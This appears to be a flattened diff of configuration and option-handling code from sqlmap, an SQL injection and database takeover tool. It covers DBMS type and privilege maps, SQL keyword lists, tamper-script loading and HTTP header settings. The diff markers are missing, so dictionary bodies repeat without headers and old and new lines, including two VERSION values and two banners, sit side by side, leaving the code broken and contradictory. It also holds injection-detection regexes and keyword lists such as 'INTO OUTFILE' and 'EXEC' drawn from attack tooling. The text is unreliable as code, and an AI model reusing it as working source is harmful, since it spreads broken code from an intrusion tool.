13: "intn",
7: "int",
6: "smallint",
5: "tinyint",
16: "bit",
2: "varchar",
18: "sysname",
25: "nvarchar",
1: "char",
24: "nchar",
4: "varbinary",
80: "timestamp",
3: "binary",
19: "text",
20: "image",
}
14: "floatn",
8: "float",
15: "datetimn",
12: "datetime",
23: "real",
28: "numericn",
10: "numeric",
27: "decimaln",
26: "decimal",
17: "moneyn",
11: "money",
21: "smallmoney",
22: "smalldatetime",
13: "intn",
7: "int",
6: "smallint",
5: "tinyint",
16: "bit",
2: "varchar",
18: "sysname",
25: "nvarchar",
1: "char",
24: "nchar",
4: "varbinary",
80: "timestamp",
3: "binary",
19: "text",
20: "image",
}
MYSQL_PRIVS = {
1: "select_priv",
2: "insert_priv",
3: "update_priv",
4: "delete_priv",
5: "create_priv",
6: "drop_priv",
7: "reload_priv",
8: "shutdown_priv",
9: "process_priv",
10: "file_priv",
11: "grant_priv",
12: "references_priv",
13: "index_priv",
14: "alter_priv",
15: "show_db_priv",
16: "super_priv",
17: "create_tmp_table_priv",
18: "lock_tables_priv",
19: "execute_priv",
20: "repl_slave_priv",
21: "repl_client_priv",
22: "create_view_priv",
23: "show_view_priv",
24: "create_routine_priv",
25: "alter_routine_priv",
26: "create_user_priv",
}
1: "select_priv",
2: "insert_priv",
3: "update_priv",
4: "delete_priv",
5: "create_priv",
6: "drop_priv",
7: "reload_priv",
8: "shutdown_priv",
9: "process_priv",
10: "file_priv",
11: "grant_priv",
12: "references_priv",
13: "index_priv",
14: "alter_priv",
15: "show_db_priv",
16: "super_priv",
17: "create_tmp_table_priv",
18: "lock_tables_priv",
19: "execute_priv",
20: "repl_slave_priv",
21: "repl_client_priv",
22: "create_view_priv",
23: "show_view_priv",
24: "create_routine_priv",
25: "alter_routine_priv",
26: "create_user_priv",
}
PGSQL_PRIVS = {
1: "createdb",
2: "super",
3: "catupd",
}
1: "createdb",
2: "super",
3: "catupd",
}
# Reference(s): http://stackoverflow.com/a/17672504
# http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES
FIREBIRD_PRIVS = {
"S": "SELECT",
"I": "INSERT",
"U": "UPDATE",
"D": "DELETE",
"R": "REFERENCE",
"E": "EXECUTE",
"X": "EXECUTE",
"A": "ALL",
"M": "MEMBER",
"T": "DECRYPT",
"E": "ENCRYPT",
"B": "SUBSCRIBE",
}
# Reference(s): https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sqls.doc/ids_sqs_0147.htm
# https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_077.htm
INFORMIX_PRIVS = {
"D": "DBA (all privileges)",
"R": "RESOURCE (create UDRs, UDTs, permanent tables and indexes)",
"C": "CONNECT (work with existing tables)",
"G": "ROLE",
"U": "DEFAULT (implicit connection)",
}
"S": "SELECT",
"I": "INSERT",
"U": "UPDATE",
"D": "DELETE",
"R": "REFERENCE",
"E": "EXECUTE",
"X": "EXECUTE",
"A": "ALL",
"M": "MEMBER",
"T": "DECRYPT",
"E": "ENCRYPT",
"B": "SUBSCRIBE",
}
DB2_PRIVS = {
1: "CONTROLAUTH",
2: "ALTERAUTH",
3: "DELETEAUTH",
4: "INDEXAUTH",
5: "INSERTAUTH",
6: "REFAUTH",
7: "SELECTAUTH",
8: "UPDATEAUTH",
}
1: "CONTROLAUTH",
2: "ALTERAUTH",
3: "DELETEAUTH",
4: "INDEXAUTH",
5: "INSERTAUTH",
6: "REFAUTH",
7: "SELECTAUTH",
8: "UPDATEAUTH",
}
DUMP_REPLACEMENTS = {" ": NULL, "": BLANK}
DBMS_DICT = {
DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "mssql+pymssql"),
DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"),
DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"),
DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"),
DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "http://pyodbc.googlecode.com/", "access"),
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"),
}
DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "mssql+pymssql"),
DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"),
DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"),
DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"),
DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "http://pyodbc.googlecode.com/", "access"),
DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
}
FROM_DUMMY_TABLE = {
DBMS.ORACLE: " FROM DUAL",
DBMS.ACCESS: " FROM MSysAccessObjects",
DBMS.FIREBIRD: " FROM RDB$DATABASE",
DBMS.MAXDB: " FROM VERSIONS",
DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS",
DBMS.INFORMIX: " FROM SYSMASTER:SYSDUAL"
}
DBMS.ORACLE: " FROM DUAL",
DBMS.ACCESS: " FROM MSysAccessObjects",
DBMS.FIREBIRD: " FROM RDB$DATABASE",
DBMS.MAXDB: " FROM VERSIONS",
DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS"
}
SQL_STATEMENTS = {
"SQL SELECT statement": (
"select ",
"show ",
" top ",
" distinct ",
" from ",
" from dual",
" where ",
" group by ",
" order by ",
" having ",
" limit ",
" offset ",
" union all ",
" rownum as ",
"(case ", ),
"SQL SELECT statement": (
"select ",
"show ",
" top ",
" distinct ",
" from ",
" from dual",
" where ",
" group by ",
" order by ",
" having ",
" limit ",
" offset ",
" union all ",
" rownum as ",
"(case ", ),
"SQL data definition": (
"create ",
"declare ",
"drop ",
"truncate ",
"alter ", ),
"SQL data definition": (
"create ",
"declare ",
"drop ",
"truncate ",
"alter ", ),
"SQL data manipulation": (
"bulk ",
"insert ",
"update ",
"delete ",
"merge ",
"load ", ),
"SQL data manipulation": (
"bulk ",
"insert ",
"update ",
"delete ",
"merge ",
"load ", ),
"SQL data control": (
"grant ",
"revoke ", ),
"SQL data control": (
"grant ",
"revoke ", ),
"SQL data execution": (
"exec ",
"execute ",
"values ",
"call ", ),
"SQL data execution": (
"exec ",
"execute ",
"values ",
"call ", ),
"SQL transaction": (
"start transaction ",
"begin work ",
"begin transaction ",
"commit ",
"rollback ", ),
}
"SQL transaction": (
"start transaction ",
"begin work ",
"begin transaction ",
"commit ",
"rollback ", ),
}
POST_HINT_CONTENT_TYPES = {
POST_HINT.JSON: "application/json",
POST_HINT.JSON_LIKE: "application/json",
POST_HINT.MULTIPART: "multipart/form-data",
POST_HINT.SOAP: "application/soap+xml",
POST_HINT.XML: "application/xml",
POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
}
POST_HINT.JSON: "application/json",
POST_HINT.JSON_LIKE: "application/json",
POST_HINT.MULTIPART: "multipart/form-data",
POST_HINT.SOAP: "application/soap+xml",
POST_HINT.XML: "application/xml",
POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
}
DEPRECATED_OPTIONS = {
"--replicate": "use '--dump-format=SQLITE' instead",
"--no-unescape": "use '--no-escape' instead",
"--binary": "use '--binary-fields' instead",
"--auth-private": "use '--auth-file' instead",
"--check-payload": None,
"--check-waf": None,
}
"--replicate": "use '--dump-format=SQLITE' instead",
"--no-unescape": "use '--no-escape' instead",
"--binary": "use '--binary-fields' instead",
"--auth-private": "use '--auth-file' instead",
"--check-payload": None,
"--check-waf": None,
}
DUMP_DATA_PREPROCESS = {
DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643
DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"},
}
DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643
DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"},
}
DEFAULT_DOC_ROOTS = {
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
}
OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
}

View File

@@ -34,7 +34,6 @@ class DBMS:
SQLITE = "SQLite"
SYBASE = "Sybase"
HSQLDB = "HSQLDB"
INFORMIX = "Informix"
class DBMS_DIRECTORY_NAME:
ACCESS = "access"
@@ -48,7 +47,6 @@ class DBMS_DIRECTORY_NAME:
SQLITE = "sqlite"
SYBASE = "sybase"
HSQLDB = "hsqldb"
INFORMIX = "informix"
class CUSTOM_LOGGING:
PAYLOAD = 9

View File

@@ -155,7 +155,6 @@ from lib.utils.deps import checkDependencies
from lib.utils.search import search
from lib.utils.purge import purge
from thirdparty.keepalive import keepalive
from thirdparty.multipart import multipartpost
from thirdparty.oset.pyoset import oset
from thirdparty.socks import socks
from xml.etree.ElementTree import ElementTree
@@ -166,7 +165,6 @@ keepAliveHandler = keepalive.HTTPHandler()
proxyHandler = urllib2.ProxyHandler()
redirectHandler = SmartRedirectHandler()
rangeHandler = HTTPRangeHandler()
multipartPostHandler = multipartpost.MultipartPostHandler()
def _feedTargetsDict(reqFile, addedTargetUrls):
"""
@@ -883,32 +881,32 @@ def _setTamperingFunctions():
resolve_priorities = False
priorities = []
for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper):
for tfile in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper):
found = False
script = script.strip().encode(sys.getfilesystemencoding() or UNICODE_ENCODING)
tfile = tfile.strip()
if not script:
if not tfile:
continue
elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, script if script.endswith(".py") else "%s.py" % script)):
script = os.path.join(paths.SQLMAP_TAMPER_PATH, script if script.endswith(".py") else "%s.py" % script)
elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)):
tfile = os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)
elif not os.path.exists(script):
errMsg = "tamper script '%s' does not exist" % script
elif not os.path.exists(tfile):
errMsg = "tamper script '%s' does not exist" % tfile
raise SqlmapFilePathException(errMsg)
elif not script.endswith(".py"):
errMsg = "tamper script '%s' should have an extension '.py'" % script
elif not tfile.endswith('.py'):
errMsg = "tamper script '%s' should have an extension '.py'" % tfile
raise SqlmapSyntaxException(errMsg)
dirname, filename = os.path.split(script)
dirname, filename = os.path.split(tfile)
dirname = os.path.abspath(dirname)
infoMsg = "loading tamper script '%s'" % filename[:-3]
logger.info(infoMsg)
if not os.path.exists(os.path.join(dirname, "__init__.py")):
if not os.path.exists(os.path.join(dirname, '__init__.py')):
errMsg = "make sure that there is an empty file '__init__.py' "
errMsg += "inside of tamper scripts directory '%s'" % dirname
raise SqlmapGenericException(errMsg)
@@ -917,11 +915,11 @@ def _setTamperingFunctions():
sys.path.insert(0, dirname)
try:
module = __import__(filename[:-3])
module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING))
except (ImportError, SyntaxError), ex:
raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex)))
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__
for name, function in inspect.getmembers(module, inspect.isfunction):
if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
@@ -953,7 +951,7 @@ def _setTamperingFunctions():
if not found:
errMsg = "missing function 'tamper(payload, **kwargs)' "
errMsg += "in tamper script '%s'" % script
errMsg += "in tamper script '%s'" % tfile
raise SqlmapGenericException(errMsg)
if kb.tamperFunctions and len(kb.tamperFunctions) > 3:
@@ -1014,12 +1012,12 @@ def _setDNSCache():
"""
def _getaddrinfo(*args, **kwargs):
if args in kb.cache.addrinfo:
return kb.cache.addrinfo[args]
if args in kb.cache:
return kb.cache[args]
else:
kb.cache.addrinfo[args] = socket._getaddrinfo(*args, **kwargs)
return kb.cache.addrinfo[args]
kb.cache[args] = socket._getaddrinfo(*args, **kwargs)
return kb.cache[args]
if not hasattr(socket, "_getaddrinfo"):
socket._getaddrinfo = socket.getaddrinfo
@@ -1166,7 +1164,7 @@ def _setHTTPHandlers():
debugMsg = "creating HTTP requests opener object"
logger.debug(debugMsg)
handlers = filter(None, [multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler])
handlers = filter(None, [proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler])
if not conf.dropSetCookie:
if not conf.loadCookies:
@@ -1396,12 +1394,16 @@ def _setHTTPExtraHeaders():
raise SqlmapSyntaxException(errMsg)
elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
if conf.charset:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5"))
if not conf.charset:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "ISO-8859-15,utf-8;q=0.7,*;q=0.7"))
else:
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset))
# Invalidating any caching mechanism in between
# Reference: http://stackoverflow.com/a/1383359
conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache"))
# Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache,no-store"))
conf.httpHeaders.append((HTTP_HEADER.PRAGMA, "no-cache"))
def _defaultHTTPUserAgent():
"""
@@ -1411,6 +1413,13 @@ def _defaultHTTPUserAgent():
return "%s (%s)" % (VERSION_STRING, SITE)
# Firefox 3 running on Ubuntu 9.04 updated at April 2009
#return "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9"
# Internet Explorer 7.0 running on Windows 2003 Service Pack 2 english
# updated at March 2009
#return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
def _setHTTPUserAgent():
"""
Set the HTTP User-Agent header.
@@ -1555,7 +1564,6 @@ def _createTemporaryDirectory():
os.makedirs(conf.tmpDir)
_ = os.path.join(conf.tmpDir, randomStr())
open(_, "w+b").close()
os.remove(_)
@@ -1571,29 +1579,21 @@ def _createTemporaryDirectory():
try:
if not os.path.isdir(tempfile.gettempdir()):
os.makedirs(tempfile.gettempdir())
except (OSError, IOError, WindowsError), ex:
warnMsg = "there has been a problem while accessing "
warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
warnMsg += "make sure that there is enough disk space left. If problem persists, "
warnMsg += "try to set environment variable 'TEMP' to a location "
warnMsg += "writeable by the current user"
logger.warn(warnMsg)
except IOError, ex:
errMsg = "there has been a problem while accessing "
errMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
errMsg += "make sure that there is enough disk space left. If problem persists, "
errMsg += "try to set environment variable 'TEMP' to a location "
errMsg += "writeable by the current user"
raise SqlmapSystemException, errMsg
if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir:
try:
tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
except (OSError, IOError, WindowsError):
tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid()))
tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
kb.tempDir = tempfile.tempdir
if not os.path.isdir(tempfile.tempdir):
try:
os.makedirs(tempfile.tempdir)
except (OSError, IOError, WindowsError), ex:
errMsg = "there has been a problem while setting "
errMsg += "temporary directory location ('%s')" % getSafeExString(ex)
raise SqlmapSystemException, errMsg
os.makedirs(tempfile.tempdir)
def _cleanupOptions():
"""
@@ -1839,11 +1839,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.bruteMode = False
kb.cache = AttribDict()
kb.cache.addrinfo = {}
kb.cache.content = {}
kb.cache.encoding = {}
kb.cache.intBoundaries = None
kb.cache.parsedDbms = {}
kb.cache.regex = {}
kb.cache.stdev = {}
@@ -1977,6 +1973,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.threadContinue = True
kb.threadException = False
kb.tableExistsChoice = None
kb.timeValidCharsRun = 0
kb.uChar = NULL
kb.unionDuplicates = False
kb.xpCmdshellAvailable = False

View File

@@ -235,7 +235,6 @@ optDict = {
"profile": "boolean",
"forceDns": "boolean",
"ignore401": "boolean",
"murphyRate": "integer",
"smokeTest": "boolean",
"liveTest": "boolean",
"stopFail": "boolean",

View File

@@ -6,7 +6,6 @@ See the file 'doc/COPYING' for copying permission
"""
import os
import random
import re
import subprocess
import string
@@ -20,11 +19,10 @@ from lib.core.enums import OS
from lib.core.revision import getRevisionNumber
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.0.10.0"
VERSION = "1.0.8.2"
REVISION = getRevisionNumber()
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
STABLE = VERSION.count('.') <= 2
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")
DESCRIPTION = "automatic SQL injection and database takeover tool"
SITE = "http://sqlmap.org"
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
@@ -32,14 +30,12 @@ GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
# colorful banner
BANNER = """\033[01;33m\
___
__H__
___ ___[.]_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| \033[0m\033[4;37m%s\033[0m\n
""" % (TYPE_COLORS.get(TYPE, 31), VERSION_STRING.split('/')[-1], SITE)
BANNER = """\033[01;33m _
___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| \033[0m\033[4;37m%s\033[0m\n
""" % ((31 + hash(VERSION) % 6) if not STABLE else 30, VERSION_STRING.split('/')[-1], SITE)
# Minimum distance of ratio from kb.matchRatio to result in True
DIFF_TOLERANCE = 0.05
@@ -68,14 +64,13 @@ BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
RANDOM_INTEGER_MARKER = "[RANDINT]"
RANDOM_STRING_MARKER = "[RANDSTR]"
SLEEP_TIME_MARKER = "[SLEEPTIME]"
PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
CHAR_INFERENCE_MARK = "%c"
PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
# Regular expression used for extraction of table names (useful for (e.g.) MsAccess)
SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>([\w.]|`[^`<>]+`)+)"
SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>[\w.]+)\b"
# Regular expression used for recognition of textual content-type
TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
@@ -89,9 +84,6 @@ MAX_CONNECTIONS_REGEX = r"max.+connections"
# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it)
PRECONNECT_CANDIDATE_TIMEOUT = 10
# Maximum sleep time in "Murphy" (testing) mode
MAX_MURPHY_SLEEP_TIME = 3
# Regular expression used for extracting results from Google search
GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&amp;cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
@@ -136,7 +128,7 @@ UNION_STDEV_COEFF = 7
TIME_DELAY_CANDIDATES = 3
# Default value for HTTP Accept header
HTTP_ACCEPT_HEADER_VALUE = "*/*"
HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
# Default value for HTTP Accept-Encoding header
HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate"
@@ -224,7 +216,6 @@ SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\
"SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
INFORMIX_SYSTEM_DBS = ("sysmaster", "sysutils", "sysuser", "sysadmin")
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
MYSQL_ALIASES = ("mysql", "my")
@@ -237,11 +228,10 @@ MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
SYBASE_ALIASES = ("sybase", "sybase sql server")
DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
INFORMIX_ALIASES = ("informix", "ibm informix", "ibminformix")
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + INFORMIX_ALIASES
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
SUPPORTED_OS = ("linux", "windows")
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
@@ -307,10 +297,9 @@ FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line \d+", r"in (?P
ERROR_PARSING_REGEXES = (
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)",
r"<li>Error Type:<br>(?P<result>.+?)</li>",
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
r"\[[^\n\]]+(ODBC|JDBC)[^\n\]]+\](\[[^\]]+\])?(?P<result>[^\n]+(in query expression|\(SQL| at /[^ ]+pdo)[^\n<]+)"
r"(?m)^\s*\[[^\n]+(ODBC|JDBC)[^\n]+\](?P<result>[^\]]+in query expression[^\n]+)$"
)
# Regular expression used for parsing charset info from meta html headers
@@ -374,7 +363,7 @@ MIN_ERROR_CHUNK_LENGTH = 8
MAX_ERROR_CHUNK_LENGTH = 1024
# Do not escape the injected statement if it contains any of the following SQL keywords
EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "DBINFO(", "'%s'" % CHAR_INFERENCE_MARK)
EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK)
# Mark used for replacement of reflected values
REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
@@ -469,7 +458,7 @@ DUMMY_SQL_INJECTION_CHARS = ";()'"
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
# Extensions skipped by crawler
CRAWL_EXCLUDE_EXTENSIONS = ("3ds", "3g2", "3gp", "7z", "DS_Store", "a", "aac", "adp", "ai", "aif", "aiff", "apk", "ar", "asf", "au", "avi", "bak", "bin", "bk", "bmp", "btif", "bz2", "cab", "caf", "cgm", "cmx", "cpio", "cr2", "dat", "deb", "djvu", "dll", "dmg", "dmp", "dng", "doc", "docx", "dot", "dotx", "dra", "dsk", "dts", "dtshd", "dvb", "dwg", "dxf", "ear", "ecelp4800", "ecelp7470", "ecelp9600", "egg", "eol", "eot", "epub", "exe", "f4v", "fbs", "fh", "fla", "flac", "fli", "flv", "fpx", "fst", "fvt", "g3", "gif", "gz", "h261", "h263", "h264", "ico", "ief", "image", "img", "ipa", "iso", "jar", "jpeg", "jpg", "jpgv", "jpm", "jxr", "ktx", "lvp", "lz", "lzma", "lzo", "m3u", "m4a", "m4v", "mar", "mdi", "mid", "mj2", "mka", "mkv", "mmr", "mng", "mov", "movie", "mp3", "mp4", "mp4a", "mpeg", "mpg", "mpga", "mxu", "nef", "npx", "o", "oga", "ogg", "ogv", "otf", "pbm", "pcx", "pdf", "pea", "pgm", "pic", "png", "pnm", "ppm", "pps", "ppt", "pptx", "ps", "psd", "pya", "pyc", "pyo", "pyv", "qt", "rar", "ras", "raw", "rgb", "rip", "rlc", "rz", "s3m", "s7z", "scm", "scpt", "sgi", "shar", "sil", "smv", "so", "sub", "swf", "tar", "tbz2", "tga", "tgz", "tif", "tiff", "tlz", "ts", "ttf", "uvh", "uvi", "uvm", "uvp", "uvs", "uvu", "viv", "vob", "war", "wav", "wax", "wbmp", "wdp", "weba", "webm", "webp", "whl", "wm", "wma", "wmv", "wmx", "woff", "woff2", "wvx", "xbm", "xif", "xls", "xlsx", "xlt", "xm", "xpi", "xpm", "xwd", "xz", "z", "zip", "zipx")
